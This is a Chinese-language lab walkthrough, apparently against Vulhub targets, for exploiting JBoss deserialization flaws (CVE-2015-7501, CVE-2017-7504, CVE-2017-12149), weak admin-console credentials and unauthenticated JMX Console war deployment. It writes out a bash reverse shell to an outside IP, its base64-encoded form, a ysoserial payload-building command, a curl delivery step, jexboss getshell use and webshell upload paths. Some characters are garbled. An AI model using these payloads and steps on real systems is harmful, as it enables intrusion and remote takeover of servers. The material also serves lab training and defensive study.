一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞
第一步:開啟靶場
第二步:訪問該接口,發現直接下載,說明接?開放,此接?存在反序列化漏洞
http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:準備ysoserial?具進?漏洞利?,將反彈shell進?base64編碼
#反彈shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1#64base編碼
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx#命令使用工具生成惡意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服務器開啟監聽,終端執行命令,成功反彈shell
#執行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞
第一步:開啟靶場
第二步:訪問漏洞靶場
#漏洞靶場
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:準備jexboss工具包,geshell
#運行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080
三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞
第一步:開啟靶場
第二步:驗證是否存在漏洞
#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly#響應碼500 --- 服務器內部錯誤,無法完成請求 --- 說明??存在,此??存在反序列化漏洞
#服務器將?戶post請求內容進?反序列化
第三步:使??具進?檢測 DeserializeExploit 如果成功直接上傳webshell
四、Administration Console弱?令
第一步:登陸后臺
#后臺地址
http://47.103.81.25:8080/admin-console/login.seam#用戶名密碼
admin:vulhub
第二步:點擊web應用,上傳后門文件shell.war
第三步:連接webshell
#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp
五、低版本JMX Console未授權
第一步:開啟靶場
#URL
http://47.103.81.25:8080/jmx-console/#用戶名密碼
admin:amdin
第二步:準備通過URL的?式遠程部署war包
第三步:將后門文件war包上傳至云服務器,并測試能否順利訪問到
第四步:填寫war包地址,點擊invoke跳轉
第五步:連接webshell
#URL
http://47.103.81.25:8080/shell/shell.jsp w
六、高版本JMX Console未授權
第一步:開啟靶場
#URL
http://47.103.81.25:8080/jmx-console/
第二步:準備通過URL的?式遠程部署war包cmd.war
第三步:連接webshell
#URL
http://47.103.81.25:8080/cmd/shell.jsp
??????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????FROM? IYU_?